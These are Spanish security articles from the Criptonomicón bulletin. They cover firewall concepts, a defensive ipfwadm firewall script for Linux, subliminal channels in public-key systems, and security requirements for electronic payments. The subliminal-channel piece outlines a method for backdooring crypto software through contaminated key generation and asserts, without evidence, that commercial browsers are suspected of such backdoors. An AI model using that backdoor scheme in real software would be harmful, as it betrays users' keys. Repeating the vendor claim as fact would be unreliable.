cabo para controlar o limitar la expansin de productos criptogrficos, tal vez
consiga mantener la confianza de los usuarios.
Publicado en el Boletn del Criptonomicn #36.
Arturo Quirantes Sierra es profesor de fsica de la Universidad de Granada y autor de las
famosas pginas entre los seguidores de este boletn, el "Taller de Criptografa", donde
destaca ltimamente la intensa labor de informacin que est realizando en una cruzada
contra Enfopol.

Informacin adicional

La seccin PGP

Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar

Borrar

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos36.html (7 of 7) [25/10/2000 02:31:06 p.m.]

Cortafuegos

Comercio electrnico

Criptologa y seguridad

Cortafuegos

Cuestiones legales

Por Luis Ventura Ruiz

Intimidad y privacidad

Antes de hablar de lo que representan los cortafuegos en el mbito de la

Virus

seguridad en redes telemticas convendra hablar un poco de qu se


entiende por seguridad. Puede haber mltiples definiciones de seguridad,
no obstante en este articulo se entender por seguridad en redes
telemticas a la proteccin frente a ataques e intrusiones en recursos
corporativos por parte de intrusos a los que no se permite el acceso a dichos
recursos. Por estos recursos entenderemos tanto el acceso a una carpeta
compartida en servidor con NT, el acceso a los buzones de correo de los
usuarios corporativos, o incluso el acceso a una sesin de Telnet de un
servidor UNIX interno.
Antes de continuar se ha de hacer notar que tradicionalmente se ha dicho en
los mbitos de seguridad en redes que el ordenador realmente seguro es
aquel que esta fsicamente desconectado de todas las redes internas o
externas (sin ninguna tarjeta de red), tampoco tendr disquetera (y en su
caso ninguna unidad de almacenamiento externo, como grabadores y
lectores de cintas, discos extraibles, etc.) o acceso a impresoras y se
encontrar en una habitacin acorazada con un guardia jurado insobornable,
y si este ordenador est apagado mejor que mejor. Con esto quiero decir
que la seguridad siempre ser relativa al tipo de servicios que queramos
ofrecer a los usuarios autorizados, segn se establece en la poltica de
seguridad de la empresa.
La poltica de seguridad es (debera ser) un documento que est (debera
estar) firmado por la alta gerencia de la empresa y mediante el cual se
especifican distintos aspectos referentes a la seguridad informtica de la
empresa. Estos aspectos pueden ser desde cuantas letras han de tener las
contraseas de los usuarios corporativos y cada cuanto tiempo han de
cambiarlas, qu protocolos (Telnet, http, smtp, ftp, etc.) van a permitir que
hablen las mquinas internas con las externas y en su caso quien va a poder
iniciar la conexin, y hasta la poltica que se va a seguir para permitir el
acceso restringido a recursos internos.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos35.html (1 of 5) [25/10/2000 02:31:07 p.m.]

Cortafuegos

Un cortafuegos nunca proteger al cien por cien a estos recursos internos de


acceso no autorizados ya que las tcnicas de intrusin avanzan da a da
(aunque el hardware y software de los cortafuegos tambin) y todos los das
se descubren nuevos fallos (bugs) en sistemas operativos y software de
servidores. Pero tambin es cierto que un cortafuegos BIEN
CONFIGURADO junto con servidores bien configurados y protegidos puede
poner las cosas muy difciles a estos potenciales intrusos, por no decir
imposibles (siempre teniendo en cuenta la poltica de seguridad de la
empresa y a la correcta configuracin de cortafuegos y servidores).
As pues, nos adentramos en los sistemas cortafuegos. Los cortafuegos son
uno de las dos enfoques bsicos que se han dado al aspecto de la seguridad
en redes telemticas.
Estos dos enfoques han sido tradicionalmente la defensa en profundidad que
se caracterizaba por proteger cada una de las mquinas susceptibles a ser
accedidas por personas no autorizadas, y por otro lado la defensa perimetral
consistente en llevar toda la carga correspondiente a la seguridad en la red
corporativa al elemento de conexin de esta red corporativa con el exterior, o
con las redes en las que potencialmente se encuentren las personas que
puedan querer acceder a nuestros recursos de forma no autorizada, ya que
est demostrado que un tanto por ciento elevado de los fraudes informticos
proceden del interior de las propias organizaciones.
Existen muchos tipos de cortafuegos, no obstante la clasificacin ms clara
quizs sera la que los diferencia segn la forma de implementar la poltica
de seguridad de la empresa atendiendo al nivel de la capa OSI en la que se
implementa dicha poltica de seguridad.
En un primer lugar existen los cortafuegos de nivel 3 de la capa OSI, esto es,
de nivel de red o lo que es lo mismo, nivel IP en redes TCP/IP como Internet.
Estos cortafuegos pueden ser considerados como filtros de paquetes ya que
lo que realizan a fin de cuentas es un filtrado de los intentos de conexin
atendiendo a direcciones IP origen y destino y puerto de destino de los
paquetes IP. Esto quiere decir que en la poltica de seguridad de la empresa
podremos indicar que slo dejaremos pasar paquetes destinados al puerto
25 (puerto de SMTP para correo electrnico) de nuestro servidor corporativo.
Tambin podremos especificar desde qu direcciones IP origen dejaremos
acceso a nuestros servidores pblicos. Este tipo de cortafuegos vienen
implementados en la mayora de routers comerciales.
Otra posibilidad de implementacin de cortafuegos es a nivel 4 de OSI, esto
es a nivel de transporte o de TCP en redes TCP/IP. En este nivel ya se
puede atender a aspectos de si los paquetes son de inicio de conexin o se
corresponden con paquetes cuyas conexiones estn ya establecidas.
A grandes rasgos los cortafuegos a nivel de circuitos ya tratan con nmeros
de secuencias de paquetes TCP/IP. Si los paquetes pertenecen a una

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos35.html (2 of 5) [25/10/2000 02:31:07 p.m.]

Cortafuegos

conexin o si no se corresponden con ninguna conexin establecida.


Por ltimo nos quedan los cortafuegos a nivel 7 de la capa OSI, esto es, a
nivel de aplicacin. Estos cortafuegos actan a modo de proxy para las
distintas aplicaciones que van a controlar. Por de pronto ya se ve que con
estos cortafuegos no ser posible dejar pasar todos los protocolos (al menos
de manera segura, esto es, no es frecuente ver cortafuegos a nivel de), pero
lo que s es cierto es que podremos llegar al detalle en cuanto a la
posibilidad de implementar polticas de seguridad para estos protocolos.
Lo normal es contar con cortafuegos a nivel de aplicacin para los protocolos
ms frecuentes en Internet: telnet, ftp , http, e incluso para menos frecuentes
como pop3, rlogin, sqlnet, etc.
Con estos cortafuegos podremos configurar a nivel de aplicacin esto es:
para SMTP podremos decir que slo se acepta correo entrante cuando la
direccin de destino sea <alguien>@nuestro.dominio.corporativo o que slo
acepte correo saliente cuando la direccin origen sea
<alguien>@nuestro.dominio.corporativo evitando as los conocidos parsitos
de servidores correo conocidos como spammers. Para HTTP podremos
evitar que las pginas que descarguen nuestros usuarios corporativos
tengan controles Activex o applets de Java, o incluso denegarles el acceso a
ciertas URLs que se consideren improcedentes. Para FTP podremos
permitir el acceso a servidores slo a cierto directorio y solo para realizar
envos o descargas de ficheros.
Otras funciones adicionales que pueden realizar los cortafuegos es la de
ocultar el rango de direccionamientos internos de nuestra corporacin,
realizando una traduccin de direcciones o NAT (Network address
translation). De esta manera es posible contar con slo una direccin (o un
rango reducido de direcciones vlidas en Internet) y contar con un gran
nmero de direcciones privadas (de acuerdo a la famosa RFC 1918) para las
mquinas internas no enrutables en Internet.
Tambin es normal que sean capaces de detectar ataques del tipo IP
spoofing, de forma que se asocia a cada interfaz una serie de direcciones
origen permitidas, de forma que no se le pueda hacer creer al cortafuegos
que desde la interfaz externa vienen paquetes con direccin IP origen una
mquina interna en la que se confa.
Otra de las caractersticas que pueden tener es la de detectar ataques de
SYN flooding mediante el cual alguien inunda nuestros servidores con
paquetes de inicio de conexin sin llegar a terminar la negociacin de
establecimiento de conexin que se establece en TCP. Con lo cual se llena
la cola de conexiones pendientes de nuestro servidor y ya no responde a
peticiones de inicio de conexin legtimas.
Tambin se ha de comentar que una de las funcionalidades ms importantes
de los cortafuegos es la de la facilidad de gestin del log de conexiones. Es
file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos35.html (3 of 5) [25/10/2000 02:31:07 p.m.]

Cortafuegos

atendiendo a este log donde se podr observar que nuestra red interna esta
siendo escaneada y que puede estar sometida a un ataque organizado
desde algn lugar en Internet.
Por ltimo volver sobre la importancia de disponer de una correcta poltica
de seguridad en la empresa. Ya que de ella depender el grado de
seguridad frente al uso indebido de los recursos corporativos. Esta poltica
de seguridad debera implicar a todos los miembros de la empresa mediante
la formacin de sus empleados en cuanto a la importancia de que sus
contraseas de usuario sean seguras (no susceptibles a ataques de fuerza
bruta o fcilmente adivinables), de que apaguen sus ordenadores cuando se
ausenten de sus sitios o protejan sus escritorios, e incluso de que tengan
cuidado con sus disquetes u hojas impresas con informacin sensible (no
sera la primera vez que se reutiliza hojas con informacin de proyectos
estratgicos de empresas). Todo esto depende del grado de seguridad (o de
paranoia) que se quiera reflejar en la poltica de seguridad de las empresas,
y variar mucho de unas empresas a otras.
En todo caso la poltica de seguridad debera proponer una mezcla de los
dos enfoques que haca referencia anteriormente: Defensa perimetral con un
cortafuegos bien configurado de acuerdo con la poltica de seguridad de la
empresa y defensa en profundidad de los servidores que vayan a ser
accedidos desde las redes pblicas.
Los servidores de Web deberan estar protegidos frente a ataques tpicos
realizados contra estos servidores: stack overflow de sus cgis, posibilidad de
acceder al document root de la mquina y poner un documento HTML no
legtimo, etc.
Lo mismo se puede decir de los servidores FTP, servidores de correo e
incluso servidores de DNS, todos ellos con sus bugs caractersticos
dependiendo de la versin y plataforma sobre la que corren (NT o UNIX),
pero a medida que se descubre un bug se publica el parche para el servidor
correspondiente, y es labor del administrador de la red el estar al tanto de
estos parches, ya que el cortafuegos puede estar bien configurado y dejar
pasar peticiones de DNS a nuestro servidor de DNS, pero nuestro servidor
de DNS puede ser susceptible a ataque de tipo DNS spoofing, por el cual se
le puede llegar a hacer creer a nuestro servidor DNS que
web_al_que_accede_nuestra_organizacin.com Sitio web al que accedemos
diariamente y que nos pide un password de entrada , es en realidad
web_malicioso_para_capturar_passwords.com y que entreguemos muchas
de nuestras passwords a alguien en Internet. Y todo esto con nuestro
cortafuegos bien configurado.
Publicado en el Boletn del Criptonomicn #35.
Luis Ventura Ruiz es ingeniero de telecomunicacin de Euskaltel con una amplia
experiencia en la instalacin de cortafuegos.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos35.html (4 of 5) [25/10/2000 02:31:07 p.m.]

Cortafuegos

Informacin adicional

LINUX como cortafuegos gratuito

Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar

Borrar

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos35.html (5 of 5) [25/10/2000 02:31:07 p.m.]

LINUX como cortafuegos gratuito

Consejos para
administradores
Consejos para
usuarios

LINUX como cortafuegos gratuito


Alfonso Lzaro Tllez, consultor de IP6Seguridad, nos ofrece sus consejos para
configurar Linux como cortafuegos gratuito y eficaz.
El boom de Internet ha llegado y muchas PYMES se quieren apuntar a lo que parece
(y todos pensamos es) una gran oportunidad de negocio.
El inconveniente principal que se encuentran estas empresas reside en las inversiones
iniciales que deben afrontar: nuevos equipos informticos, nuevo software, una
conexin frame relay, ... y en cuanto estn enganchados a Internet se plantean aadir
seguridad a toda esa inversin que han tenido que hacer. En algunos casos estas
empresas se encuentran con que las inversiones en seguridad son a veces tan
importantes como las de las mquinas que quieren proteger, sintindose como
expresa el refrn espaol que "estn pagando ms por el collar que por el perro".
La solucin que aqu planteo es gratuita. Consiste en configurar un Linux como
cortafuegos. Las ventajas que nos ofrece esta solucin son obvias:
Linux es un sistema operativo gratuito.
La mquina donde correr el cortafuegos no es necesario que sea una gran
mquina: con un Pentium 133 con 32 megas de RAM sera posible. Incluso
con menos.
Fiabilidad bastante alta: muchas empresas estn eligiendo una opcin de este
tipo.
El nico inconveniente de esta opcin es que la administracin y configuracin de un
cortafuegos con Linux precisa a alguien con conocimientos del sistema operativo.
Para ilustrar la configuracin del cortafuegos voy a poner un ejemplo que coincide
con una gran cantidad de redes que poseen las PYMES.

En este esquema necesitaremos una mquina no de ltima generacin, por ejemplo


file:///C|/TEMP/criptonomicon/criptonomicon/consejos/cortafuegoslinux.html (1 of 3) [25/10/2000 02:31:07 p.m.]

LINUX como cortafuegos gratuito

un Pentium 133 o parecido, con 32 megas de RAM y 3 tarjetas de red.


Instalamos el sistema operativo en la maquina y lo fortificamos. Para ello
bsicamente quitamos todos los servicios que ofrece Linux.
Nuestro cortafuegos no debe ofrecer ningn servicio hacia el exterior. Eliminaremos
la mayora de los programas setuids que no sean fundamentales en el sistema.
Recompilaremos el ncleo para que pueda aceptar nuestras tarjetas de red. Y lo ms
importante: pensaremos una poltica de seguridad para nuestra empresa.
Aqu incluyo un programa que configurar bsicamente nuestro cortafuegos.
#!/bin/sh
# Definimos las variables
export ROUTER=194.100.xxx.1
export WEBSERVER=194.100.xxx.66
export DNS=194.100.xxx.67
export CORREO=194.100.xxx.68
export FTP=194.100.xxx.69
export PROXY=192.168.xxx.2
export MIRED=192.168.xxx.0/255.255.255.0
export ALL=0/0
# levantamos las interfaces
ifconfig eth0 194.100.xxx.2 netmask 255.255.255.192
ifconfig eth1 194.100.xxx.65 netmask 255.255.255.192
ifconfig eth2 192.168.xxx.1 netmask 255.255.255.0
# aadimos las rutas
route add -net 194.100.xxx.64 netmask 255.255.255.192 dev eth1
route add -net 192.168.xxx.0 netmask 255.255.255.0 dev eth2
route add -host $ROUTER dev eth0
route add default gw $ROUTER
# Empezamos con la poltica
# Denegamos el forwarding por defecto
# ipfwadm --> comando de firewall, -F forwarding , -p politica
ipfwadm -F -p rej
# aceptamos entrada y salida de correo
ipfwadm -F -a acc -S $ALL -D $CORREO 25 -P tcp
ipfwadm -F -a acc -D $ALL -S $CORREO 25 -P tcp -k
ipfwadm -F -a acc -S $CORREO -D $ALL 25 -P tcp
ipfwadm -F -a acc -D $CORREO -S $ALL 25 -P tcp -k

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/cortafuegoslinux.html (2 of 3) [25/10/2000 02:31:07 p.m.]

LINUX como cortafuegos gratuito

# aceptamos la recogida de correo desde la red interna


ipfwadm -F -a acc -S $MIRED -D $CORREO 110 -P tcp
ipfwadm -F -a acc -D $MIRED -S $CORREO 110 -P tcp -k
# aceptamos peticin y consultas de DNS
ipfwadm -F -a acc -S $ALL -D $DNS 53 -P tcp -b
ipfwadm -F -a acc -S $ALL -D $DNS 53 -P udp -b
# aceptamos peticiones de FTP
ipfwadm -F -a acc -S $ALL -D $FTP 21 -P tcp
ipfwadm -F -a acc -D $ALL -S $FTP 21 -P tcp -k
ipfwadm -F -a acc -S $FTP -D $ALL 20 -P tcp
ipfwadm -F -a acc -D $FTP -S $ALL 20 -P tcp -k
# aceptamos hacer masquerade desde el proxy
ipfwadm -F -a acc -S $PROXY -D $ALL -m
# Para loguear el resto de peticiones. Los logs se guardan en /var/log/messages
# Si no se desea loguear comentar la siguiente lnea.
ipfwadm -F -a rej $ALL -D $ALL -o
# Fin del fichero de configuracin.
Este cortafuegos es muy bsico, no es perfecto ni mucho menos, no tiene reglas
antispoof y alguna que otra pequea limitacin, pero a grandes rasgos es un
cortafuegos utilizable por una empresa.
De todas maneras siempre se aconseja que la configuracin y administracin del
cortafuegos la lleve un especialista. Pero tampoco deje que le digan que todos los
cortafuegos son caros y hay que pagar grandes cantidades de dinero por sus licencias
y el software.
Participa con tus consejos y trucos
Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/cortafuegoslinux.html (3 of 3) [25/10/2000 02:31:07 p.m.]

Canales subliminales en sistemas de clave pblica

Comercio electrnico

Criptologa y seguridad

Canales subliminales en sistemas de clave pblica

Cuestiones legales

Por Jaime Agudo Bretos

Intimidad y privacidad

Introduccin

Virus

El modelo utilizado en los protocolos criptogrficos es generalmente una


comunicacin entre dos entidades a travs de un canal pblico. El objetivo
de los protocolos en este entorno es mantener una comunicacin secreta,
verificada, etc., a pesar de la existencia de terceros que puedan manipular,
almacenar o sustituir los mensajes.
Si embargo esta no es la nica situacin en la cual se puede utilizar la
criptografa.
Desarrollado por Simmons, existe el modelo de Canal Subliminal. Este
modelo se caracteriza por la existencia de dos comunicantes que no pueden
cifrar sus comunicaciones y que solo les est permitido firmarlas.
El modelo se desarrolla en un entorno carcelario donde dos presos se
comunican mensajes entre ellos y quieren tener la seguridad de que no son
engaados por el vigilante. Sin embargo el vigilante no les dejara
comunicarse si no tuviera la certeza de que puede leer el contenido de sus
mensajes.
La vuelta de tuerca de Simmons consiste en el desarrollo de un sistema
criptogrfico basado en firmas. Es decir, los comunicantes podran enviar
informacin escondida dentro de las firmas de otros mensajes. Varios
protocolos criptogrficos como ElGamal varios tienen cifrados alternativos
para el mismo mensaje. Se pueden elegir parmetros de manera que el
resultado contenga informacin para el otro comunicante.
Posteriormente, Desmend desarrolla sistemas criptogrficos libres de
canales subliminales. Estos sistemas se denominan Criptosistemas Libres
de Abuso.
Canales Subliminales en Sistemas de Clave Pblica
La razn por la que los Canales Subliminales se han vuelto a poner de moda

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos33.html (1 of 3) [25/10/2000 02:31:08 p.m.]

Canales subliminales en sistemas de clave pblica

en los ambientes criptogrficos es la utilizacin de estos sistemas para


implementar Caballos de Troya en el software criptogrfico existente.
Normalmente se considera el software criptogrfico fiable. Es decir, no se
tiene en consideracin que el software de cifrado es ni ms ni menos que un
programa que tiene acceso a toda nuestra informacin confidencial
principalmente por el hecho de que es lo que la protege.
Sera tericamente posible realizar una versin del PGP que enviara toda
nuestra informacin secreta por correo a cualquier lugar de la Internet y
depositarlo en cualquier lugar pblico para que fuera utilizado. Estas
modificaciones maliciosas existen y de hecho han causado problemas de
seguridad. Sin embargo son sencillamente detectables por mtodos directos.
El problema ocurre cuando las tcnicas de los Canales Subliminales son
aplicadas para realizar estas modificaciones. El entorno es similar al
carcelario, un programa y su programador se tienen que comunicar sin que
el vigilante, el usuario del programa, se entere.
El programador de un programa de criptografa generara un par clave
pblica, clave privada para su uso y despus modificara los programas.
El mtodo general para comprometer los programas de seguridad es el
siguiente:
Generar un Canal Subliminal en las Claves
1. Generar el par Clave Secreta, Clave Pblica del programa con una semilla
aleatoria
2. Cifrar la semilla aleatoria con la Clave Pblica del programador
3. Introducir la semilla cifrada en la Clave Pblica del programa
Como resultado se obtiene una Clave Pblica, contaminada e indetectable,
que el programador puede utilizar para obtener la Clave Secreta
simplemente descifrndola y volvindola a generar.
Estas modificaciones del programa se esconderan el cdigo criptogrfico
siendo muy difciles de detectar, incluso en un posible desensamblado del
programa, al ser posible esconderlas dentro de primitivas perfectamente
legales.
Consecuencias
Como principal consecuencia de estas modificaciones es la falta de
seguridad, a priori, en mdulos criptogrficos generados por terceros, es
decir, compaas de software como Microsoft o Netscape.
Sera perfectamente posible, y de hecho se sospecha, que sus navegadores
contengan sistemas como el esbozado en sus mdulos de criptografa, que

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos33.html (2 of 3) [25/10/2000 02:31:08 p.m.]

Canales subliminales en sistemas de clave pblica

permitan recuperar las claves de los usuarios por los realizadores del
programa.
Es posible utilizar mtodos basados en los Criptosistemas Libres de Abuso
para desarrollar protocolos interactivos entre los navegadores y entidades de
certificacin que permitieran evitar estos problemas pero es difcil
implementarlos por la dificultad de establecer estndares en estos sistemas.
La solucin ms sencilla es utilizar software fiable para realizar las
comunicaciones que requieran seguridad. Especialmente software de
distribucin abierta, en cdigo fuente, que se puede comprobar, y lo ms
importante, compilar en la propia mquina reduciendo drsticamente las
posibilidades de ser contaminado.
El prximo desarrollo de cryptozilla, la versin segura de mozilla, ampla
considerablemente las posibilidades de eleccin en materia de seguridad
para los usuarios.
Publicado en el Boletn del Criptonomicn #33.
Jaime Agudo Bretos es investigador de la Universidad de Zaragoza, experto en
criptografa.

Informacin adicional

Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar

Borrar

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos33.html (3 of 3) [25/10/2000 02:31:08 p.m.]

Seguridad en los nuevos medios de pago

Comercio electrnico

Criptologa y seguridad

Seguridad en los nuevos medios de pago

Cuestiones legales

Por Antonio Valverde Garca

Intimidad y privacidad

Introduccin

Virus

Como es bien conocido, los medios de pago tradicionales sufren numerosos


problemas de seguridad: falsificacin de billetes, falsificacin de firmas,
cheques sin fondo, etc. Por otro lado, los medios de pago electrnicos,
adems de estar sujetos a los mismos problemas anteriores, presentan
riesgos adicionales, pues a diferencia del papel, los documentos digitales
pueden ser copiados perfectamente y cuantas veces se desee, las firmas
digitales pueden ser falsificadas por cualquiera que conozca la clave privada
del firmante, la identidad de una persona puede ser asociada de forma
inequvoca con la informacin relacionada en cada pago, etc.
Es por ello que es necesario establecer nuevos mecanismos de seguridad
para los nuevos medios de pago electrnicos, si se quiere que tanto las
entidades bancarias como los usuarios finales acepten de forma
generalizada estos nuevos medios de pago. Por otro lado, si los sistemas de
pago electrnicos son bien diseados, pueden proporcionar una mayor
seguridad y flexibilidad de uso que la ofrecida por los medios de pago
tradicionales.
La criptografa est jugando un papel fundamental en la incorporacin de
nuevos medios de pago a los ya existentes hoy en da, pues es la base
sobre la que se sustenta la seguridad de estos nuevos medios. Por otro lado,
la aparicin de nuevos dispositivos fsicos como las tarjetas inteligentes y
otros mdulos de seguridad permite y posibilita la implementacin de los
diferentes protocolos criptogrficos de estos medios de pago.
Espaa es uno de los pases pioneros en la adopcin de nuevos medios de
pago y nuevas tecnologas como lo demuestran la presencia de la tarjeta
monedero (Visa Cash) en el mercado desde hace ya 4 aos y la
implantacin, ms reciente, de los sistemas de pago a travs de Internet. En
un futuro prximo los espaoles veremos adems como nuestras
tradicionales tarjetas de crdito y dbito, que tradicionalmente operan a

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos30.html (1 of 6) [25/10/2000 02:31:08 p.m.]

Seguridad en los nuevos medios de pago

travs de una banda magntica, sern sustituidas por tarjetas inteligentes


con los ms populares algoritmos criptogrficos y que podrn contener
adems, cualquier tipo de aplicacin financiera.
Requisitos de seguridad de los medios de pago electrnicos
Los requisitos de seguridad pueden variar ligeramente de un sistema de
pago a otro dependiendo tanto de las caractersticas propias del sistema
como por la confianza que exista entre los diferentes elementos del mismo.
As, un sistema de pago realizado en un entorno en el que las
comunicaciones se realizan a travs de una red de rea local o
metropolitana sin salir al exterior, no requiere el mismo nivel de seguridad
que un sistema de pago en el que las transacciones se envan a travs de
Internet, pudiendo recorrer el mundo entero.
En cualquier caso, podemos decir que los requisitos de seguridad de un
sistema de pago electrnico en general son los siguientes:
Autenticacin
En todo sistema de pago los participantes del sistema deben demostrar que
son los que dicen ser. As en un sistema de pago basado en tarjetas de
crdito, el comercio comprueba la autenticidad de la tarjeta antes de
proceder con el pago.
En el caso de tarjetas inteligentes (con microprocesador, dotadas por tanto
de una capacidad de clculo) esto se realiza mediante algn protocolo
criptogrfico de autenticacin, mientras que en el caso de tarjetas con banda
magntica, se realiza mediante una verificacin visual de ciertos datos
grabados en la superficie de la tarjeta (hologramas, firmas, etc.).
En el caso de sistemas de pago basados en monederos electrnicos, es
frecuente tambin que se produzca una autenticacin del comercio ante el
portador del monedero electrnico, debido al riesgo existente de creacin de
dinero falso en este tipo de sistemas. Para ello el terminal del comercio suele
disponer de un mdulo de seguridad, que en ocasiones es una tarjeta
inteligente pero puede ser otro tipo de dispositivo, el cual almacena las
claves y realiza los clculos necesarios para la autenticacin del comercio.
En los sistemas basados en tarjetas, se suele verificar tambin la asociacin
correcta de la tarjeta con su poseedor (Titular de la cuenta asociada a la
tarjeta). Esto se realiza normalmente a travs de nmeros de identificacin
personal (PIN). Lo mismo ocurre en los sistemas de pago a travs de redes
donde se necesita una autenticacin de la persona fsica que utiliza en un
instante determinado el sistema.
La autenticidad del resto de agentes de un sistema de pago electrnico es
normalmente garantizada mediante protocolos criptogrficos de
autenticacin, actualmente basados en algoritmos de clave simtrica como

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos30.html (2 of 6) [25/10/2000 02:31:08 p.m.]

Seguridad en los nuevos medios de pago

el DES, pero que poco a poco estn siendo remplazados por algoritmos de
clave pblica como el RSA con el fin de favorecer la interoperabilidad de los
sistemas.
Integridad
Otro aspecto importante en todo sistema de pago electrnico es la integridad
de los datos intercambiados entre los agentes del sistema, mxime cuando
esos datos se refieren a importes de un pago, a un nmero de cuenta
bancaria, etc. La integridad de las comunicaciones es garantizada mediante
cdigos de autenticacin de mensajes (MACs), funciones resumen y firmas
digitales. En el caso de la relacin cliente - comercio, esto slo es posible
cuando el cliente est en posesin de un dispositivo con capacidad de
clculo y de almacenamiento seguro de claves, como es el caso de una
tarjeta inteligente.
Adems, es tambin importante salvaguardar la integridad de los datos
almacenados en los dispositivos asociados a cada agente. Las claves
criptogrficas, los certificados, las listas negras, los datos para el intercambio
de operaciones, etc., necesitan ser protegidos contra la alteracin voluntaria
o involuntaria de los mismos. Esto se consigue de muy diversas maneras
segn el tipo de agente y segn el dispositivo asociado a l. As por ejemplo,
las claves criptogrficas de clientes y comercios suelen almacenarse en
tarjetas inteligentes y mdulos de seguridad (SAMs) respectivamente. Las
listas negras en los comercios se verifican y renuevan peridicamente y los
datos en los servidores de las entidades financieras que intervienen en el
sistema de pago de son almacenados en bnkers de seguridad que
normalmente se encuentran duplicados para evitar las posibles prdidas de
informacin como consecuencia de posibles fallos.
Confidencialidad
Ciertos datos intercambiados durante una transaccin de pago necesitan ser
ocultados a la vista de todo el mundo salvo para el agente al que van
destinados dichos datos. Es el caso de la informacin asociada con la
cuenta bancaria de un titular que se transmite a travs de una red y que slo
concierne al titular y a la entidad bancaria depositaria de dicha cuenta.
Tambin ciertos datos asociados con los bienes o servicios adquiridos son
susceptibles de ocultacin en cuanto a que pueden constituir datos sensibles
que en manos de terceros pudieran causar un grave perjuicio directo o
indirecto al cliente.
La confidencialidad es normalmente garantizada mediante el cifrado de
datos. Sin embargo, sta cuestin est resultando ser un problema en la
mayora de los pases debido a las restricciones impuestas por los diferentes
gobiernos para utilizar algoritmos criptogrficos de cifrado de datos con un
alto nivel de seguridad. En algunos pases (Francia) el cifrado de datos est
absolutamente prohibido sin el permiso de la oficina gubernamental

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos30.html (3 of 6) [25/10/2000 02:31:08 p.m.]

Seguridad en los nuevos medios de pago

correspondiente y normalmente sin el depsito previo de las claves de


cifrado en dicha oficina. En otros pases (EE.UU.) se restringe la utilizacin
de estos algoritmos al territorio nacional, debiendo utilizar una versin
mermada del algoritmo si se quiere utilizar ms all de sus fronteras.
En ciertos casos se requiere que el pago se realice de forma annima de tal
modo que sea imposible a partir de ciertos datos, elaborar una traza que
permita descubrir el autor de un determinado pago. Estos sistemas requieren
protocolos criptogrficos ms complejos cuando el pago se realiza a travs
de una cuenta bancaria, pues los datos del titular son almacenados en el
momento de la autorizacin del pago o de la retirada de dinero (en el caso
del monedero electrnico). Actualmente el anonimato es garantizado en
todas aqullas transacciones que se realizan con dinero no ligado a una
cuenta bancaria, como por ejemplo las tarjetas de prepago en las cabinas
telefnicas.
Prueba de la transaccin
Cuando se produce una transaccin electrnica en la que una cantidad de
dinero se mueve de un agente a otro de la transaccin, es necesario una
prueba de la misma que permita al pagado reclamar ese dinero y evite que
el pagador reniegue del pago. Generalmente, el banco depositario de la
cuenta del cliente (banco emisor) debe pagar una determinada cantidad de
dinero al banco depositario de la cuenta del comercio (banco adquirente) por
las transacciones llevadas a cabo en sus terminales. El banco emisor
reclamar entonces una prueba de que dichas transacciones fueron
efectivamente realizadas por titulares de cuentas de ese banco y por el
importe reclamado.
La prueba de la transaccin suele ser realizada por el cliente en los casos en
que ste dispone de un dispositivo con capacidad de clculo (tarjeta
inteligente, PC, etc.). Suele consistir en una firma digital realizada mediante
algn algoritmo de clave pblica con el fin de evitar la repudiacin de la
prueba. Sin embargo, puesto que en la mayora de los sistemas de pago
electrnico existe una relacin bilateral de responsabilidades entre el titular y
el banco emisor de la tarjeta del titular, la prueba de la transaccin suele
consistir en un MAC con funciones de firma digital, generado con un
algoritmo de clave simtrica en el que la clave es compartida por el titular de
la cuenta (cliente) y el banco emisor, con el fin de reducir el tiempo de
